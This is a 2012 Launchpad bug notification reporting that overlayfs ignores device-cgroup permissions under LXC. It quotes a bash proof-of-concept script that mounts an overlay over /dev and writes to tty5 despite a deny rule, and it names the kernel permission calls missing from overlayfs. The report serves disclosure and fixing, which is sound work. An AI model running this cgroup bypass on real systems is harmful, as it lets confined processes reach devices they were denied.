[Bug 915941] [NEW] overlayfs does not honor lxc-related permissions
Gary Poster
gary.poster at canonical.com
Fri Jan 13 11:05:49 UTC 2012
Public bug reported:
Using overlayfs with lxc causes tty problems that can kill X. Overlayfs
needs to honor the necessary cgroup permission calls, per the following
information from Serge.
"""
here is a script which you can use to test the overlayfs
issue:
========================= exploit-overlayfs-devices.sh =======================
#!/bin/bash
ddir=`cat /proc/self/mountinfo | grep cgroup | grep devices | awk '{ print $5 }'`
if [ "x$ddir" = "x" ]; then
    echo "couldn't find devices cgroup mountpoint"
    exit 1
fi
# create new cgroup
ndir=`mktemp -d --tmpdir=$ddir exploit-XXXX`
# create a directory onto which we mount the overlay
odir=`mktemp -d --tmpdir=/mnt exploit-XXXX`
# create the directory to be the overlay dir (where changes
# will be written)
udir=`mktemp -d --tmpdir=/tmp exploit-XXX`
mount -t overlayfs -oupperdir=$udir,lowerdir=/dev none $odir
echo $$ > $ndir/tasks
# deny all device actions
echo a > $ndir/devices.deny
# but allow mknod of tty5 (char 4:5), bc we have to mknod it in the writeable
# overlay (copy-up of the device node)
echo "c 4:5 m" > $ndir/devices.allow
echo "devices.list: XXXXXXXXXXXXXXX"
cat $ndir/devices.list
echo "XXXXXXXXXXXX"
# try writing to /dev/tty5 - not allowed
echo x > /dev/tty5
echo "write to /dev/tty5 returned $?"
# try writing to tty5 on the overlayfs - SHOULD not be allowed
echo y > $odir/tty5
echo "write to $odir/tty5 returned $?"
umount $odir
rmdir $odir
rm -rf $udir
# move ourselves back to root cgroup (else we can't delete the temp one
# bc it's occupied - by us)
echo $$ > $ddir/tasks
rmdir $ndir
========================= exploit-overlayfs-devices.sh =======================
The write to /dev/tty5 will fail, but the write to $odir/tty5 will
succeed.
fs/overlayfs/inode.c calls generic_permission, but it needs to do more
of what fs/namei.c:inode_permission() does, in particular the calls to
devcgroup_inode_permission() and security_inode_permission().
"""
[This blocks resolution of bug 914169]
** Affects: launchpad
Importance: High
Status: Triaged
** Affects: lxc (Ubuntu)
Importance: Undecided
Status: New
** Tags: paralleltest
** Also affects: launchpad
Importance: Undecided
Status: New
** Changed in: launchpad
Status: New => Triaged
** Changed in: launchpad
Importance: Undecided => High
--
You received this bug notification because you are a member of Ubuntu
Server Team, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/915941